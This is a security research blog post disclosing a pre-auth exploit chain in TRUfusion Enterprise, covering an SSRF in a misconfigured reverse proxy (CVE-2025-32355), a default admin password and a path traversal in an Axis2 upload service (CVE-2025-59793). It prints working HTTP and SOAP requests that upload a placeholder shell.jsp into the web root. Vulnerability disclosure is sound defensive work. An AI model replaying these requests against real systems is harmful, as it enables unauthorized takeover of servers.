Get in touch

When Audits Fail Part 2: From Pre-Auth SSRF to RCE in TRUfusion Enterprise

Feb 16, 2026 · By Julien Ahrens

In September 2025, we published a research article describing multiple pre-auth vulnerabilities in Rocket Software’s TRUfusion Enterprise, a product marketed as a “secure data exchange platform . Our analysis demonstrated that an unauthenticated attacker could fully compromise a TRUfusion instance without possessing valid credentials.

One issue we intentionally excluded from that initial publication was an additional, high-impact server-side request forgery vulnerability (CVE-2025-32355 ) that remained unpatched for almost a year. This SSRF can be chained with the default password trubiquity and an additional path traversal vulnerability in the WsPortalV6UpDwAxis2Impl service (CVE-2025-59793 ) to achieve pre-auth remote code execution once again.

Full Read Pre-Auth SSRF (CVE-2025-32355)

TRUfusion Enterprise uses a reverse proxy to route different endpoints to different internal services. However, the proxy is misconfigured to accept absolute URLs in the HTTP request line. When such a request is received, the proxy incorrectly treats the supplied URL as a routable backend target and initiates an outbound request to the specified resource, returning the response to the client. As a result, an attacker can force the proxy into fetching and proxying arbitrary external resources, effectively turning it into an unauthenticated forward proxy.

The following example demonstrates this behaviour by loading our website:

GET https://www.rcesecurity.com/ HTTP/1.1
Host: target.com

While this behaviour is already problematic by effectively exposing the service as an open, unauthenticated forward proxy, the proxy can also be abused to access internal services. By specifying internal IP addresses or hostnames as the absolute URL, an attacker can reach otherwise non-exposed internal applications, such as a related Keycloak instance:

A Full-read SSRF is already a powerful vulnerability, and - in case of TRUfusion - can be used to query an interesting Axis 2 interface that is only reachable through localhost:

Post-Auth Path Traversal (CVE-2025-59793)

The Axis2 instance exposes a service called WsPortalV6UpDwAxis2Impl, which can be used to upload files through an XML request like this:

POST http://localhost/axis2/services/WsPortalV6UpDwAxis2Impl HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:142.0) Gecko/20100101 Firefox/142.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
SOAPAction: urn:uploadFile
Priority: u=0, i
Te: trailers
Connection: keep-alive
Content-Type: text/xml
Content-Length: 1531

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:updw="http://updw.webservice.ddxPortalV6.ddxv6.procaess.com">
   <soapenv:Header/>
   <soapenv:Body>
      <updw:uploadFile>
         <!--type: string-->
         <updw:login>admin</updw:login>
         <!--type: string-->
         <updw:password>trubiquity</updw:password>
         <!--type: string-->
         <updw:archiveName>shell.jsp</updw:archiveName>
         <!--type: string-->
         <updw:jobNumberSend></updw:jobNumberSend>
         <!--type: string-->  <updw:jobDirectory>/../../../../opt/TRUfusion/web/tomcat/webapps/trufusionPortal/jsp/</updw:jobDirectory>
         <!--type: base64Binary-->
         <updw:dataHandler>Ly95b3VyIGpzcCBjb2RlIGhlcmU=</updw:dataHandler>
      </updw:uploadFile>
   </soapenv:Body>
</soapenv:Envelope>

You might have noticed three things in this request:

  1. The service requires a username and password; however, the administrative account ships with the default password trubiquity. If you’re lucky enough, then the TRUfusion administrator hasn’t changed that password since it seems to be an optional process according to their documentation .

  2. The jobDirectory parameter accepts path traversal sequences, allowing an attacker to escape the intended upload directory. When combined with the archiveName and dataHandler parameters, this enables writing attacker-controlled files to arbitrary locations on the file system, with the file contents supplied as base64-encoded data.

  3. Our exploit chains the path traversal with the previously described SSRF (CVE-2025-32355) because the Axis2 instance is bound to localhost and as such isn’t accessible. However, we noticed that this is not true for all TRUfusion versions, and some expose the Axis2 interface directly.

On this way, you can upload the same shell as used in our previous exploit:

To gain remote code execution (again):

Stay safe out there.